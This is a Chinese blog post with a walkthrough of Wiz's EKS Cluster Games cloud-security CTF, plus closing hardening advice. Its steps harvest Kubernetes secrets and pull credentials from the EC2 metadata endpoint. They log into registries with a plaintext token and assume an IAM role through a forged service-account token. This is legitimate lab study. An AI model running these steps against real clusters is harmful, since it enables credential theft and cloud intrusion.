云安全-wiz eks-cluster-games题解与思考

最新推荐文章于 2024-04-19 07:20:25 发布
最新推荐文章于 2024-04-19 07:20:25 发布
阅读量1k 收藏 15
点赞数 19
分类专栏: 网络安全 # 云原生安全 文章标签: 云安全 wiz aws ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lady_killer9/article/details/135035425
版权

目录

题目1 Secret Seeker

在这里插入图片描述
可以看到有secrets的get和list权限

kubectl get secrets
kubectl  get secrets log-rotate -o yaml

之后base64解码即可
在这里插入图片描述

题目2 Registry Hunt

在这里插入图片描述
可以看到有secrets的get和pods的list、get权限

由于没有secrets的list权限,我们需要先通过pods来确定secret的名称

kubectl get pods
kubectl get po database-pod-2c9b3a4e -o yaml

在这里插入图片描述
查看secret

kubectl get secret registry-pull-secrets-780bab1d -o yaml

在这里插入图片描述
之后发现题目的crane工具可以登录
在这里插入图片描述

crane auth login index.docker.io -u eksclustergames -p dckr_pat_YtncV-R85mG7m4lr45iYQj8FuCo

下载镜像层

crane pull eksclustergames/base_ext_image base_ext_image.tar
tar -xvf base_ext_image.tar

在这里插入图片描述
解压

tar -xvf 193bf7018861e9ee50a4dc330ec5305abeade134d33d27a78ece55bf4c779e06.tar.gz

在这里插入图片描述
最后再cat一下就行了

部分尝试
在这里插入图片描述
尝试了docker,发现这个节点没有
在这里插入图片描述
也无法安装

题目3 Image Inquisition

第二个单词是“盘问”的意思,看来要搞镜像了
在这里插入图片描述
可以看到有pods的list和get权限

kubectl get po
kubectl get po accounting-pod-876647f8 -o yaml

在这里插入图片描述
看了Hint #1
在这里插入图片描述
然后发现,正是我前段时间研究AWS EC2时的文章中写的SSRF安全问题

curl 169.254.169.254/latest/meta-data

在这里插入图片描述
查看iam临时凭据

curl 169.254.169.254/latest/meta-data/iam/security-credentials/eks-challenge-cluster-nodegroup-NodeInstanceRole

在这里插入图片描述
配置好aws cli后生成密码,并使用crane获取更多信息。

aws ecr get-login-password | crane auth login --username AWS --password-stdin 688655246681.dkr.ecr.us-west-1.amazonaws.com
crane config 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c@sha256:7486d05d33ecb1c6e1c796d59f63a336cfa8f54a3cbc5abf162f533508dd8b01

在这里插入图片描述ARTIFACTORY_TOKEN就是flag

部分尝试
在这里插入图片描述
进行了类似题目2的尝试,失败了,原因是没有权限

在这里插入图片描述
进行权限列表获取,失败了,原因是没有权限

题目4 Pod Break

在这里插入图片描述
可以看到没有权限了,那就只能通过sts了

aws eks help

在这里插入图片描述
生成token

aws eks get-token --cluster-name eks-challenge-cluster

在这里插入图片描述
获取secrets

kubectl get secrets --token k8s-aws-xxx

在这里插入图片描述
查看具体内容

kubectl get secrets node-flag --token k8s-aws-xxx -o yaml

在这里插入图片描述

部分尝试
在这里插入图片描述
验证权限,确实没有了

题目5 Container Secrets Infrastructure

在这里插入图片描述

{
    "Policy": {
        "Statement": [
            {
                "Action": [
                    "s3:GetObject",
                    "s3:ListBucket"
                ],
                "Effect": "Allow",
                "Resource": [
                    "arn:aws:s3:::challenge-flag-bucket-3ff1ae2",
                    "arn:aws:s3:::challenge-flag-bucket-3ff1ae2/flag"
                ]
            }
        ],
        "Version": "2012-10-17"
    }
}

允许列出和读取s3桶的对象,那应该就是flag对象了

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "Federated": "arn:aws:iam::688655246681:oidc-provider/oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589"
            },
            "Action": "sts:AssumeRoleWithWebIdentity",
            "Condition": {
                "StringEquals": {
                    "oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589:aud": "sts.amazonaws.com"
                }
            }
        }
    ]
}

授权时做了限制,限制了audience和Federated

{
    "secrets": [
        "get",
        "list"
    ],
    "serviceaccounts": [
        "get",
        "list"
    ],
    "pods": [
        "get",
        "list"
    ],
    "serviceaccounts/token": [
        "create"
    ]
}

可以列出或读取secrets/serviceaccounts/pods内容,可以创建serviceaccounts/token
在这里插入图片描述实际上做了限制,只能给debug-sa这个创建token
aws cli没有s3权限,只能先看看eks集群有啥信息了

kubectl get sa

在这里插入图片描述
只有sa有东西,不理解,可能权限给多了
在这里插入图片描述
debug-sa应该也没用,description写了没有policy。
创建一个token试一下

kubectl create token debug-sa

在这里插入图片描述
在这里插入图片描述
解密发现和策略的限制能对的上,那看来其实是用debug-sa的
在这里插入图片描述
发现并不行,auience是不对的,翻到前面的限制发现audience必须sts.amazonaws.com
在这里插入图片描述
加上audience后终于成功了
在这里插入图片描述
在这里插入图片描述
切换后终于有s3权限了
在这里插入图片描述

部分尝试
在这里插入图片描述
尝试创建token,没有权限

思考

权限不必提供

攻击到集群,可以执行命令后,首先要做的就是查看权限,常用命令

kubectl auth can-i --list

在这里插入图片描述

secret使用时需要注意

base64编码不安全

镜像使用

注意镜像层是否有敏感信息,防止通过docker history等命令暴露;dockerconfig等镜像仓库配置需要保存好。

云上配置

注意RBAC、IAM policy等敏感配置,遵循最小权限原则。

参考

wiz-宣布EKS集群游戏
k8s学习-Secret(创建、使用、更新、删除等)

k8s-私有仓库拉取镜像
容器注册表工具-crane

云原生-AWS EC2使用、安全性及国内厂商对比
aws-cli
aws-ecr工具使用
如何获取凭据
aws-cli-sts

aws-cli-eks

aws-cli-s3
https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role-with-web-identity.html?highlight=assumerolewithwebidentity
JSON Web Tokens (JWT) 在线解密

lady_killer9
关注
  • 19
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
pg091-xadc-wiz.pdf-教程与笔记习题
05-18
IP Product Guide
行业教育软件-学习软件-Filter Wiz Lite 1.08 英文版.zip
08-02
行业教育软件-学习软件-Filter Wiz Lite 1.08 英文版.zip
笔记工具 rj-wiz-setup
01-02
rj-wiz 桌面笔记工具,简单实用,强大,可以满足日常的工作需要。
m-wiz
03-07
关于工具: M-wiz是一种基于bash的脚本,正式为termux的metasploit-framework用户使用此工具制作而成,只需单击一下即可安装,修复,更新,备份,备份以及更多其他功能。 此工具可在根目录为Android的设备和非根目录为Android的设备上使用。 适用于: Termux 测试于: Termux 要求 : 互联网600 MB 外部存储权限 储存1Gb 1GB内存 特征 : [+]安装Metasploit! [+]更新维护! [+]易于初学者! [+]修复metasploit! [+]解决了Ruby问题! 安装[Termux]: apt-get update -y apt-get upgrade -y pkg install python -y pkg install python2 -y pkg install git -y pi
Wiz+云安全工作流程手册-18页.pdf
09-07
Wiz+云安全工作流程手册-18页
云安全-wiz eks-cluster-games题解思考_wiz eks cluster games
最新发布
Python毕设源码程序王哥
04-19 977
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。进行了类似题目2的尝试,失败了,原因是没有权限。进行权限列表获取,失败了,原因是没有权限。
vivado编译报错 [Synth 8-439]
1615549892
07-30 4186
我的代码里面有通过宏定义来选择编译。 例如:我有一个SPI_ILA模块,用来抓spi的接口波形,这个模块在有SPI_ILA_OPEN定义时才编译,正常情况我不需要编译此模块。这个SPI_ILA模块在层次结构里面,但是还报错说找不到SPI_ILA模块。 解决办法 层级结构上右击->Hierarchy Update" -> "Automatic Update, Manual Compile Order". 或者TCL运行: set_property source_mgmt_mode Di
【收集】Http Content-Tpye 对照表大全
老陈聊架构
05-09 3208
文件扩展名 Content-Type(Mime-Type) 文件扩展名 Content-Type(Mime-Type) .*( 二进制流,不知道下载文件类型) application/octet-stream .tif image/tiff .001 application/x-001 .301 application/x-301 .323 text/h323 .906 application/x-906 .907
HTTP Content-type 文件类型对照表
zgs921364401的博客
07-30 1231
文件扩展名 Content-Type(Mime-Type) 文件扩展名 Content-Type(Mime-Type) .*( 二进制流,不知道下载文件类型) application/octet-stream .tif image/tiff .001 application/x-001 .301 application/x-301 .323 text/h323 .906 ...
ESP32-C3-12F模块.zip
07-15
安信可 乐鑫 ESP32-C3-12F模块带3D效果
如何使用irsa将火花提交给亚马逊eks集群
weixin_26755331的博客
08-18 171
In previous article, I have introduced how we submit a Spark job to an EKS cluster. As long as we’re using other AWS components for our pipelines to interact, like S3/DynamoDB/etc., we need assign IAM...
创建EKS Cluster的笔记
北墨
05-30 430
首先准备好配置cluster的yaml文件,然后运行eksctl create cluster -f xxx.yaml eksctl create cluster -f airlfow-eks-cluster.yaml 2021-05-28 16:58:28 [ℹ] eksctl version 0.49.0 2021-05-28 16:58:28 [ℹ] using region ap-southeast-2 2021-05-28 16:58:29 [✔] using existing V...
操作系统-吸烟者问题(C++信号量实现)
关注网络安全、云原生安全
08-05 3256
三个吸烟者在一个房间内,有一个香烟供应商.为了制造并抽烟,每个吸烟者必须具备:烟草、纸和火柴. 三个吸烟者中,第一个有烟草,第二个有纸,第三个有火柴.供应者有丰富的货物, 随机将两样东西放在桌子上名允许一个吸烟者进行对健康不利的吸烟. 当吸烟者完成吸烟后唤醒供应者,供应者再把两样东西放在桌子上,唤醒另一个吸烟者. 采用信号量编写他们同步工作的程序. ...
eksctl 命令整理
lovely_nn的博客
01-19 2212
eksctl命令行工作原理是:通过 aws cli 调用 CloudFormation 的相关 API,启动一个创建 EKS Cluster 的 Stack 和一个创建 EKS nodes 的 Stack 去创建集群所需的各种资源(包括网关、IP、VPC、EC2 等) eksctl命令整理: 列出集群和节点组 列出集群 $ eksctl get cluster 列出节点组 $ eksctl get nodegroup --cluster=<clustername> 指定配置文件创建、删
网络安全-自学笔记
热门推荐
关注网络安全、云原生安全
12-01 15万+
目录 WEB(应用)安全 前端安全 xss攻击 后端安全 文件上传漏洞 WebShell 解析安全 数据安全 sql注入 通信安全 WEB(应用)安全 前端安全 xss攻击 后端安全 文件上传漏洞 WebShell 解析安全 数据安全 sql注入 网络安全-sqlmap学习笔记 通信安全 网络-http协议学习笔记(消息结构、请求方法、状态码等) ...
网络安全-webshell详解(原理、攻击、检测与防御)
关注网络安全、云原生安全
09-14 6万+
简介 原理 攻击 WebShell管理工具 Cknife中国菜刀 antSword中国蚁剑 冰蝎动态二进制加密网站管理客户端 weevely3Weaponized web shell Altmanthe cross platform webshell tool in .NET Webshell SniperManage your website via terminal quasibotcomplex webshell manager, quasi-http botne...
网络安全-跨站脚本攻击(XSS)的原理、攻击及防御
关注网络安全、云原生安全
08-01 4万+
所用工具 Google出品:开源Web App漏洞测试环境:Firing Range 简介 跨站脚本攻击(全称Cross Site Scripting,为和CSS(层叠样式表)区分,简称为XSS)是指恶意攻击者在Web页面中插入恶意Script代码,当用户浏览网页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss是攻击客户端,最终受害者是用户,网站管理员也是用户之一。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过.
现代密码学-传统密码技术(置换、代换密码)
关注网络安全、云原生安全
06-03 3万+
置换密码/huanweim 置换密码(Permutation Cipher)又叫换位密码(Transposi-tionCipher),它根据一定的规则重新排列明文,以便打破明文的结构特性。置换密码的特点是保持明文的所有字符不变,只是利用置换打乱了明文字符的位置和次序。 最常见的置换密码有二种: 列置换密码(明文遵照密钥的规程按列换位并且按列读出序列得到密文);周期置换密码(将明文P按固定长度m分组,然后对每组按1,2…,m的某个置换重排位置从而得到密文C)。 ...
filter wiz pro
05-15
Filter Wiz Pro是一种功能强大的图像滤镜软件,它基于先进的算法和技术,可以对图像进行全方位的处理和优化。它提供多种不同类型的滤镜,用户可以根据自己的需求进行选择和使用,从而实现图像的增强、修复、去噪、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

lady_killer9

感谢您的打赏,我会加倍努力!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值